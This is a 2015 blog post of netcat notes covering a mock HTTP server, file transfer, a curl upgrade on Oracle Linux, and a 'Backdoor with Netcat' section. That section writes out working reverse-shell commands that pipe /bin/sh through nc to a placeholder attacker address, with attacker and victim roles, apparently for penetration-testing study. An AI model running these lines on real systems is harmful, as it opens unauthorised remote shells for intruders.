Saturday, September 12, 2015

nc (netcat) - Swiss army knife for TCP and UDP connections

From the nc(1) manual page: the nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet(1) does with some.

Common uses include:

· simple TCP proxies
· shell-script based HTTP clients and servers
· network daemon testing
· a SOCKS or HTTP ProxyCommand for ssh(1)
· and much, much more
---------------------------------------------------------------------
Backdoor with Netcat
***********************
http://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem
http://www.michaelboman.org/books/penetration-testing-notes/netcat

With a backpipe (ip_do_atacante stands for the attacker's IP address; start the attacker's listener first, and note that binding port 443 requires root). The FIFO /tmp/backpipe carries what nc receives from the attacker into the shell's stdin, while the shell's stdout is piped into nc and sent back, so the two one-way pipes form a full-duplex shell without nc's -e option:

attacker# nc ip_do_atacante -nvl 443
victim# mknod /tmp/backpipe p
victim# /bin/sh 0</tmp/backpipe | nc ip_do_atacante 443 1>/tmp/backpipe
or
victim# /bin/sh -c "/bin/sh 0</tmp/backpipe | nc ip_do_atacante 443 1>/tmp/backpipe"


Without a backpipe (three terminals, and the order matters: start the attacker's listener in term1, then the victim pipeline, then connect from term2 and type commands there; their output arrives in term1). `-nvlp 80` is the traditional netcat syntax; with the OpenBSD nc used in the other commands the listener is `nc -nvl 80`, and port 80 also needs root:

victim# nc -nvlp 80 | /bin/sh | nc ip_do_atacante 443

(term1)attacker# sudo nc ip_do_atacante -nvl 443
(term2)attacker# nc ip_da_vitima 80


Mock web server
*********************
file: test.http
-------------------------
HTTP/1.1 200 OK
Server: SimpleHTTP/0.6 Python/2.7.1
Date: Wed, 09 Sep 2015 19:45:04 GMT
Content-type: application/octet-stream
Last-Modified: Fri, 04 Sep 2015 12:21:46 GMT
Transfer-Encoding: chunked

4
Wiki
5
pedia
3
 in
7
chunks.
0
*******************
The blank line after the final 0 chunk is required: it terminates the (empty) trailer section of the chunked body. The file above uses bare LF line endings; RFC 7230 requires CRLF, so a strict client may reject it even if curl accepts it.
server# nc 192.168.1.36 -l 8001 < test.http
client# curl -v --http1.1 http://192.168.1.36:8001/test >/dev/null

Transfer a file
**********************
server# nc -l 1234 < examples.out
client# nc 192.168.1.35 1234 > /tmp/examples.in

Start the listening side first. nc gives no integrity or confidentiality guarantee: compare a checksum of examples.out and /tmp/examples.in afterwards (the receiving nc may have to be stopped with Ctrl-C once the sender closes), and only do this on a trusted network or through an ssh tunnel.


*************************************
Updating curl on Oracle Linux to get the --http1.1 option

1) Create a new file called /etc/yum.repos.d/city-fan.repo
2) Paste the following content:
    [CityFan]
    name=City Fan Repo
    baseurl=http://www.city-fan.org/ftp/contrib/yum-repo/rhel5/x86_64/
    enabled=1
    gpgcheck=0
3) Run:
sudo yum clean all && sudo yum install curl

Caveat: gpgcheck=0 installs whatever that third-party mirror serves without any signature verification, so prefer importing the repository's signing key and setting gpgcheck=1. The rhel5 directory in baseurl must also match your Oracle Linux major release, and with enabled=1 the repository will keep replacing curl and libcurl (and everything linked against them) with its own builds on every yum update; disable it again after the install if that is not what you want.
